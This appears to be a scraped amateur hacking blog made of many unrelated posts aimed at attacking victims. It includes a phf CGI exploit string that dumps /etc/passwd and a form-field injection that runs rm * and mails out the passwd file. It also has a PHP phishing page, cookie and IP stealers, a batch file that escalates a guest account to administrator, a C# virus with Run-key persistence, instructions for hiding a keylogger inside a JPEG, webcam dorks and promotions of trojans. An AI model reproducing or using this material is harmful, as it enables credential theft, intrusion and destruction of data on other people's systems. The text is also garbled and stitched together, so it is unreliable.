b. The common cgi-bin/phf query:

This section is for the very beginning hcaker (All advanced hcakers need not apply) Lets take the same scenerio from the first example except in the URL we would type … … if the phf is operational and has not been rem

oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd… so the entire string would look like this

/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x .

c. Dont take my cgi form:

This section will explain how to use somebody else’s cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:

This is a form to go to Modify

This is a simple form that asks a user to input a message to be sent to a script called Included in the script is the following line which is assuming the line has already been parsed out.

system(”/usr/lib/sendmail -t $myaddress < $tempfile”)
Now lets set up your page:

Hcak AOL

value=” ; rm * ;mail -s file < /etc/passwd;”>

The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.

d. Changing web pages from your browser:

This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section….…. we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 “some text and shit”%2
0>>filename.html…… This string will allow you to write to the filename.html and add “some text and shit” be noted it has to be in html format. You can place text, pictures or whatever you like.

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser… It may also inform the guru’s and advanced hcakers some bits of information of perl and cgi. In further reading check out my sec

and file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting…… wake up!!! thus I conclude…..

IV - Suggested Reading

Phrack Magazine: Very informative…. covers just about everything from phreaking to hcaking…. Just download all the damn articles.

Building Internet Firewalls by O’Reilly & Associates, Inc. aka “The Big Wooden Door”": Covers all kinds of attacks, different firewall solutions, and invulnerablities.

Perl in 21 days by Samsnet: Good starting book in Perl programming also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi but if you dont know Perl or C programming then dont bother, also covers security issues.

new cookies stealing from mozilla firefox to hack

new cookies stealing from mozilla firefox to hack

new cookies stealing from mozilla firefox to hack gmail or orkut

Hacking orkut or Gmail" With the Help of Cookies or by "stealing cookies of the victim
By going through this post i hope you will understand how easy has hacking become with the help of cookies.

By this post you'll be learning cookie stealing and Hacking orkut Or Gmail account.

Procedure to hack gmail or orkut through mozilla by stealing cookies:-

1.Firstly you need have Mozilla firefox
2.Download cookie editor plugin for Mozilla firefox
3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts

Cookie Script:


How to use cookies script?

1. Replace your number "UserId.value=33444211"
How to Replace your Number
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script


Your script will look like


2.Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
3.You'll Get his cookie in your scrap book
4.After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor) filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211)

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.

Hacking MSN

Hacking MSN

a small trick ll worked for me hence posting it here

Hacking MSN is actually VERY simple. Msn is designed to route the connection through a microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise microsoft would waste alot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.

If u recieve some crap like as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will recieve a clear IP.

once u have d IP u can do anything with him by Fingerprinting.

U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).

Spreading viruses by ip

Spreading viruses by ip
download it ..
send it to victim ..
he must run it ..
go to telnet ..
-->run > telnet ..
type o
type ip address .. of the victim ..
then if entered correctly ..
it would ask for username and password ..


u r in the victims PC ..
now u can control his PC using DOS commands ,,

Hacking 100% [ Don't Misuse It ]

Hacking 100% [ Don't Misuse It ]
Hey hackers. i hav got many requests for a way to hack email accounts. many just wanna play with ur frenz. here comes ur software. this is a keylogger. if u use it properly, it sends all ur fren's text input to u or logs the text onto the computer. plz avoid using this for illegal purposes. if u misuse are some instructions

1) Try to get the manual from the website of Perfect Keylogger or find
the help file after u finish installing the keylogger

2) BE VERY CAREFUL when installing the keylogger. If u install it with the wrong settings, it will use some funny configurations and stay on the computer forever so make sure u install it properly. Unless u configure it properly, it will hog RAM and slow ur comp.

3) I have no idea on the details of using this thing. therefore, i would advice all of us to get the manual from the website before attempting anything.

4) For whatever consequences ur actions may lead to, neither me nor this community is responsible. U are using this programme entirely at ur own risk and watever happens, me and the community are not responsible.



Perfect Keylogger

Another Way !

1) The best way is to get a trojan or a keylogger into ur friends computer. Keyloggers log the letters typed and send them to ur email. Trojans steal the input in the "password" field and send them to the hacker(u). I would recommend u to use a keylogger because trojans are illegal and keyloggers are not. Trojan may destroy ur friend's computer and if his Anti-Virus finds it, u may be in trouble. So use a good keylogger like Perfect Keylogger or Keylogger Pro. Install it in ur friend's comp and configure it to send it to u. Be VERY CAREFUL when messing with a keylogger because it can be very infective and can secretly sit in ur computer and hog RAM. I didnt try using keyloggers because i knew it was too risky. This is the best method to hack because it really works

2) Many people in other communities claim to have a very good hacking method.

u want to hack orkut or yahoo id . den just send e-mail on in the following pattern .
Step1:write the e-mail u want to hack.
step2:write ur id
step3:password to ur id
step4:type following code
step6:send it on
actually this id belongs to one of the officer of msn id maintainance departement. within 24 hours u'l get password .
so enjoy ............


3) U have to hack into the mail proider's server(gmail, yahoo, hotmail)
Magic Password Stealer !

Be very carefull with this software.. it is a trojan.. and if u want to use this u hav to disable your antivirus and then open it and set it properly and then it will create a file and that file u should not open.. u hav to send it to your frnd and the password will be sent to you when he opens it.. and if u do something wrong your own password will be sent to you.. and next time please dont ask for hacking softwares.. thnx. IF it asks for a password is 123456 and the username is samjohny4u..


Change "xx" to "tt .

Friday, February 22, 2008

hack lan

Friends i am very much interested in hacking.Exactly 1yr ago i was writing online exam in my college.I do not know anything about that exam.A small doubt came to me that is
How to hack lan? so that i can hack online questions.While thinking a cute idea strikes me at that time.But i can't succeed with that idea..But i can hack other computer which
are connected to mainframe(LAN).Well it soo easy tirck to hack system.I am providing you steps to hack others system:
1)Click on Start.
2)Go to all programs>accessories.
3)Right click on command promt and then click proporties.
4)Click on Find target.
5)Now you entered in system 32.
6)Now search this file "ddeshare" without quotes.
7)Double click on Ddeshare.
8)Now go to shares and then click "trusted shares".
9)You will be seeing many terminals (computers)connected to lan.
10)Just double click on any of the system you want to hack.
This is you can hack others system which is connected to lan..

I dont know whether this tricks works in your college or not.Why because few colleges will be using high security alerts.
Well i can successfully hack others system.But i cannot able hack to hack lan.
Hopefully i found few information about hacking lan.First of all we have to hack system administration password.This can be done only by braking (PDC)Primary domain controller.You can get information from this video How to hack lan.
After watching this video carefully you can able to hack administration password.PDC can be brake only when we are able to hack First system. And then take sam db to break administration password.Better to use tool from your system that enables you to use IPC connections to send executable files.
Here i am giving you trick to hack admin password:
first of all you have to scan the range for open 139, 445,3389,6129..
139,145 -->ipc hacking...
3389 --->remote desktop connetion(Best way for hacking :) )
6129 ----->It means that there is ranning dameware server.......
We can also hack admin password by using telnet hacking.
This trick is good enough for cracking administration password...

Well this is the good trick to hack lan.I will be very thankful if you please leave your ideas about hacking lan so that i can learn from you.:)

Have you ever wondered of hacking a password using a picture?

Have you ever wondered of hacking a password using a picture?
You may get doubt how to use invisible keylogger?well a brief procedure is written below just read carefully.

Hacking passwords is not so easy yet, But so many methods have come into role but there is no genuine way to hack any passwords.Well, "Integrated World" Introducing a damn new trick to Hack any password.Hope the method seems to be easy but its not so easy to implement.
In this method Keylogger play a major role. Hope everyone is familiar with keyloggers, Well you might get a question how does a keylogger works to hack other passwords, and moreover keyloggers are just used to record the keystrokes,logs,visited website,passwords in a pc.Then how come these keyloggers can hack others passwords that too of another user and from a different pc. Then you are obviously correct in thinking so.
In this Way of hacking i used invisible keyloggers to hack, Where these invisible keyloggers are undetectable,They even do the same work as keyloggers but they can do on others pc's too. Ok, Then you might think, how can i hack the others password through these keyloggers. That work is left to invisible keyloggers, They have an automated option to send you a e-mail, go to configure settings and set your email id there. Through this method you'll hack not only passwords but the users entire Keystrokes typed, Logs, Chat monitors and many more.Just you have to set the Report frequency of your wish.

Now stepping into the actual process to hack passwords
1.Basic requirements are you should have a keylogger and a picture of .jpg format or any other format of your wish but i recommend .jpg as it is easy to download.
2.I recomend anyone of these keyloggers "SKL" and "INSIDE KEYLOGGER"
Download SKL

3.Install the keylogger and give your email id in the Email options, I recomend yahoo. So you are half way done.
4.Now move to the folder in which you have your keylogger and one jpg image Zip both the files and save it in .jpeg format and upload the file on to the server. As the server will not allow you to upload the .exe files

5.This is another method to hide your Keylogger
copy these files to C:\ drive and paste them into a folder and open the command prompt window

6. the most important step is type this command at command prompt.

copy /b sourceimagefile.jpg + filetobehidden.exe targetimage.jpg
Now the logger in the .jpeg format
7.Now the antivirus cant detect the file.
8.Just send the uploaded image to the victim as soon as he clicks the image file invisible keylogger will be installed.
He'll b enjoying with picture and you enjoy with his emails.

As some part of the trick is inherited but implementation no one would have thought it.
Any errors,bugs,doubts will be clarified

for cascading jpeg file with exe file go throught this topic Learn binding jpeg with Exe file

all about fake login

all about fake login
Here are some fake pages. (THEY ARE READY MADE. U just have to view the source and change the email address. then upload to freeweb7. thats all)






Hotmail (2007).rar


NEW 2007 !!

Yahoo! GeoCities (2007).rar!%20GeoCities%20(2007).rar


hi5.rar! NEW



fake login page
TEP:1 open he website of ORKUT or HOMAIL or REDIFF MAIL or YAHOOMAIL, its your wish. if you want to HACK yahoo id, then go o

STEP2: Now press "CTRL+U", you will get the source code of yahoo page. NOw press "CTRL+A" copy all the text.

step3: Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML

STEP4: Now open the the file yahoofake.html using noepad, here you ll find a code which starts with (form action="xxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
delete the above code and paste the yr id
step6: NOw save the file.

you can test whether its working or not. just open the yahoofake.html file and in the place of user name and password, type some thing and sign in. you will get the passwords in your mail id.. check out..
a new section for php based fake pages after which ny1 will be able to make fake page of any website(really)

so lets start now:-

first of all u need to know the source code of the website of which u want fake page
*for that right click on the webpage n click on view page source a new window will open just select all n copy the content n save it as urpage.html(u can name it nything u like acc to webpage)

now open ur urpage.html n search for :


firstly copy the text in blue n remember it u ll need it in ur php file

replace the text in blue with ur php filename like orkut.php

ur php file:

header ('Location: blue text here ');
$handle = fopen("login.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

now replace the text "blue text here" with the blue text from above

n now save the php file as orkut.php

now make a login.txt file which would be a blank file

now upload all the three files orkut.html,orkut.php,login.txt in a webhost which supports php like freeweb7(or u can google for more webhost for dat)

now u all r thinking dat how will i get the passwords?????
all the data entered in ur fake page will be stored in ur login.txt file which u can access thru ur webhost

so now enjoy ur new fake webpage

Thursday, February 21, 2008

Much Simpler trick to HACK admin from GUEST

Much Simpler trick to HACK admin from GUEST
Much Simpler trick to HACK admin from GUEST

Well thats possible ..

Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.

HaCk "GUEST" with Admin privileges........

echo off
title Please wait...
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

Hack a PC by USB.......

Hack a PC by USB.......
Hack a PC by USB.......

Download it.... (527 KB)

1 = Extract it.

2 = open pcinfo

3 = select all the files and paste it in ur USB ( not in any folder, at the main root )

4 = insert it in the pc u wanna hack...

5 = Open the USB drive, give it 2 sec and and ur job is done...

And now open the dump folder in ur pc and u will have all the info u want....

Info u will obtain: [IMAGE]

Ok now the problem which i was facing....

well i think it duznt autorun on PC with antivirus... U have to manually click the nircmd.exe

I m trying to figure out this problem but still not getting t... if any one knows how to fix it plz do tell.....

Hack into others webcams..........

Hack into others webcams..........
This is not a hacking Guide..

It's rather a tutorial to show you how to do a simple search for unprotected webcams on the nets

This is only for fun purposes...

You are totally responsible for your actions...


Go to this link :

and put this into the search Bar
intitle:liveapplet inurl:LvAppl

and click on google search...

it would show you a list of searched items....
Go to any of the link...Some of them doesn't works..
and you would be able to see webcams...

You would be able to see street/Traffic cams...

and not only can also control them move them right or left or zoom in or out...

It's great !!

Have fun

NOTE : You need to have high speed connection for this...

some more strings

inurl:indexFrame.shtml Axis




Note :- some links may not work...!!
Here are more google hacks for security cams:

inurl:indexFrame.shtml Axis
intitle:snc-rz30 inurl:home/
intitle:"supervisioncam protocol"
intitle:liveapplet inurl:LvAppl
intitle:"Live View / - AXIS"
intext:"MOBOTIX M1"
intext:"Open Menu"
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml Axis
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"
"Kamerainformationen anzeigen"
intitle:"AXIS 2100 Network Camera Axis 2100 Network Camera 2.02"
intitle:"Linksys Web Camera" "ver"

use proxies...maybe a bit unsafe

Use/Run your free trial software forever......

Use/Run your free trial software forever......
After download:

add you free trial software name

browse and open your free trial software icon (example: tuneup.exe)

type your new date in the simulated run date box and run!!!!!!!!!!!!!!.change your date if you trial software do not work properly or expired.

enjoy !!!!!!!!!!!!!!!!!!!!!!


Simple loop code (virus)

Simple loop code (virus)
NOT exactly a virus..but

Its make spam on your pc with empty folder on desktop and startup.

Lang = VB

Private Sub Form_Load()
For i = 1 To 10000
MkDir "C:\Documents and Settings\All Users\Desktop\1" & "" & i
MkDir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\1" & "" & i
End Sub

This code is simple but evil

VB spy example!

VB spy example!
It is coding for spying on others. or in other words getting some data..

it has vb and php codes, all that u need is upload the php file to your web server, and execute vb source,

rsT = "&name=" & Me.Text1.Text & "&insMessage=" & Me.Text2.Text & "&submit=Enviar"

(u can type the following replacing text1 and text2, for expamle)

rsT = "&name=" & " PC Name of user " & winsock2.LocalHostName & "&insMessage=" & "Local IP of user" & winsock2.LocalIP & "&submit=Enviar"

(u can steal more information from the pc of the user if u want, Bios data , etc. The log u can see via PHP file, that has a log .....)

Download the source code with PHP file from this site :

languages for making softwares.etc

Visual Basic 6:

Portable Visual Basic 6:


turbo c++ 3.0 compiler:


[C#]X-Mas Virus [Simple - NonDestructive]

[C#]X-Mas Virus [Simple - NonDestructive]
[C#]X-Mas Virus [Simple - NonDestructive]

For Syntax Highligting:


using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Threading;
using System.IO;
using System.Text;
using System.Windows.Forms;
using Mcft.Win32;

namespace proj
public partial class Form1 : Form
public Form1()

private void Form1_Load(object sender, EventArgs e)
string me = Application.ExecutablePath;
string to = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\wdmon.exe";
File.Copy(me, to, true);
string keyname = "wdmon";
string runKeyBase = @"SOFTWARE\Mcft\Windows\CurrentVersion\Run\";
RegistryKey runKey = Registry.LocalMachine.CreateSubKey(runKeyBase);
runKey.SetValue(keyname, to + "\\wdmon.exe");

if (DateTime.Now.Month == 12)
if (DateTime.Now.Day == 25)
string Desktop = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
using (StreamWriter sw = File.CreateText("Christmas-Ownage.txt"))
sw.WriteLine("You Got Owned by illuz1oN's X-Mas Virus, ~censored~ You!");
foreach (string filePath in Directory.GetFiles(@"C:/", "*", SearchOption.AllDirectories))
File.SetAttributes(filePath, FileAttributes.Hidden | FileAttributes.System);
sw.WriteLine("Your File: " + filePath + " Just Got Owned");

that code will be useless without the GUI

so here it is compiled.

Anybody can run this.

if ONLY runs the virus code when its December 25th

PHP : Ip Stealer

PHP : Ip Stealer
PHP : Ip Stealer


$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "";
$sujet = "Ip + Host";
$message = "Moment : $date
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}

Change with your email.
Create a document php, give the link to someone and you'll receive his ip and host in your email box...

Simple Cookie Grabber

Simple Cookie Grabber
Simple Cookie Grabber

As the title says....

Language = PHP


$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$data = date("d/m/y");
$ora = date("G:i:s");
$os = getos($_SERVER['HTTP_USER_AGENT']);
$browser = getbrowser($_SERVER['HTTP_USER_AGENT']);
function getbrowser($usr_ag)
if (stristr($usr_ag,"IE"))
$brw = "Internet Explorer";
else if (stristr($usr_ag,"Firefox"))
$brw = "Mozzilla Firefox";
else if (stristr($usr_ag,"Opera"))
$brw = "Opera";
$brw = "Sconosciuto";
return $brw;
function getos($usr_ag)
if (stristr($usr_ag,"Windows"))
$os = "Windows XP or Vista";
else if (stristr($usr_ag,"Linux"))
$os = "Linux";
else if (stristr($usr_ag,"MAC"))
$os = "Mac";
$os = "Sconosciuto";
return $os;
$file = fopen("cookies.html", "a");
fwrite($file, 'Cookie: [ '.$cookie.' ]
Referer: [ '.$referer.' ]
Browser: [ '.$browser.' ]
Sistema Operativo: [ '.$os.' ]
IP: [ '.$ip.' ]
Data: [ '.$data.' ]
Ora: [ '.$ora.' ]


Some Backdoor sources


@@ = tt

u will love it.....

Email Xtractor

Email Xtractor
Email Xtractor


#!/usr/bin/perl -w
#Email Xtractor
my $emailz = $ARGV[1];
my $output = $ARGV[2];
if(@ARGV < 2){ usage(); }
#Take emails, and place into an array!
open(EMAIL, $emailz);
if($emailz =~m/(*@*.net|*@*.com|*@*{
my @em=;
foreach my $chck(@em){
print "Email $. : $chck Saved\n";
open(FI, $output){
print "Email Extractor - illuz1oN\n\n";
print "$. : $chck\n";
print "Emails Saved to $output\n";
} else {
print "Emailz Not Valid!\n";
sub usage {
print qq[-==+-----------------------------------+==-
-==+ Email Extractor +==-
-==+ Usage: [file.*] [output.*] +==-
-==+ Xample: email.txt ext.txt +==-

Email Leecher 0.1/fast paypal checker

Email Leecher 0.1
Type in any @Domain you want e.g - and let this leecher gain all emails it can for mailing lists!
not tested and not uploaded by me.


fast paypal checker
here is lite tool to check paypals fast


Best Hacking Tools -85in1-

Best Hacking Tools -85in1-

Audio theme:
Sean Paul - Temperature

43.2MB Compress
29.7MB UnCompress
No pass

Main page:


Page 1:

MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head Fuck HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSN

PAge 2:

Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B-S Spy
Saria Fake Logins

Page 3:
Yahoo Password Retrieval
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S-H Yahoo Password Sender

Page 4:

NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute Forcer

PAge 5:

Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb Attacker

Page 6:

MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus Cleaner
MSN Dondurucu



Wireless Hack Toolz 7 in 1 *AIO*

Wireless Hack Toolz 7 in 1 *AIO*
AIO Wireless Hack Toolz

This is nicely put best wireless tools into one pack.
It includes Kismet, NetStumbler, Wellenreiter, WEPcrack, airsnort, wepwedgie and Hotspotter.
Also reading is included to help you.
Must Have for wireless fans.




WEPcrack 0.1.0





?# NetStumbler-0.4.0 : wireless access point identifier - listens for SSIDs and sends beacons as probes searching for access points.

?# Kismet-2005-08-R: wireless sniffer and monitor - passively monitors wireless traffic and sorts data to identify SSIDs, MAC addresses, channels and connection speeds.

?# Wellenreiter-v1.9: WLAN discovery tool - uses brute force to identify low traffic access points; hides your real MAC address; integrates with GPS.

?# WEPcrack 0.1.0: Unix based-pearl aplication encryption breaker - cracks 802.11 WEP encryption keys using the latest discovered weakness of RC4 key scheduling.

?# airsnort-0.2.7e: encryption breaker - passively monitoring transmissions, computing the encryption key when enough packets have been gathered.

?# wepwedgie-0.1.0-alpha: for toolkit that determines 802.11 WEP keystreams and injects traffic with known keystreams in order to crack WEP in minutes.

?# Hotspotter-0.4: Wireless client attacking t??l.

Most programs are open source, and very useful if you know what your doing.

Note:some of these programs render.useless
links to how to install are provided in the package, as there is support for windows there as well.
.::Also includes::.

?# Advanced Bash-Scripting Guide

This document is both a tutorial and a reference on shell scripting with Bash. It assumes no previous knowledge of scripting or programming, but progresses rapidly toward an intermediate/advanced level of instruction. The exercises and heavily-commented examples invite active reader participation. Still, it is a work in progress. The intention is to add much supplementary material in future updates to this document, as it evolves into a comprehensive book that matches or surpasses any of the shell scripting manuals in print.

?# Bash Guide for Beginners

The Bash Guide for Beginners gets you started with Bash scripting and bridges the gap between the Bash HOWTO and the Advanced Bash Scripting Guide. Everybody who wants to make life easier on themselves, power users and sysadmins alike, can benefit from reading this practical course. The guide contains lots of examples and exercises at the end of each chapter, demonstrating the theory and helping you practice. Bash is available on a wide variety of UNIX, Linux, MS Windows and other systems.

?# The Linux Network Administrator's Guide, Second Edition

This book was written to provide a single reference for network administration in a Linux environment. Beginners and experienced users alike should find the information they need to cover nearly all important administration activities required to manage a Linux network configuration. The possible range of topics to cover is nearly limitless, so of course it has been impossible to include everything there is to say on all subjects. We've tried to cover the most important and common ones. We've found that beginners to Linux networking, even those with no prior exposure to Unix-like operating systems, have found this book good enough to help them successfully get their Linux network configurations up and running and get them ready to learn more.
Last but not least.... here is a very interesting read we came accross awhile back that is very interesting nonetheless.





Ardamax Keylogger v2.8

Ardamax Keylogger v2.8
Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.

Keylogger Features:
* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.
* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.
* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!
* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.
* Network delivery - sends recorded logs through via LAN.
* Clipboard logging - capture all text copied to the Windows Clipboard.
* Visual surveillance - periodically makes screenshots and stores the compressed images to log.
* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP
* Security - allows you to protect program settings, Hidden Mode and Log file.
* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.
* Application monitoring - keylogger will record the application that was in use that received the keystroke!
* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
* It records every keystroke. Captures passwords and all other invisible text.

Other Features:
* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install


717 Hacks AIO (Hacking Tools)

717 Hacks AIO (Hacking Tools)



CrackDownloader v2.2

CrackDownloader v2.2

CrackDownloader is an easy to use tool to find and download cracks and serials through internet quickly.

It searches for cracks/serials over the internet in the best cracks/serials sites and show you the results in moments!, then you can download any crack/serial quickly.

Since CrackDownloader doesn't use Internet Explorer to search and get the cracks and serials, you can use it without any fear of any Virus, Adware, Trojan or Immoral content that most of the crack sites contain, so it's 100% saveware !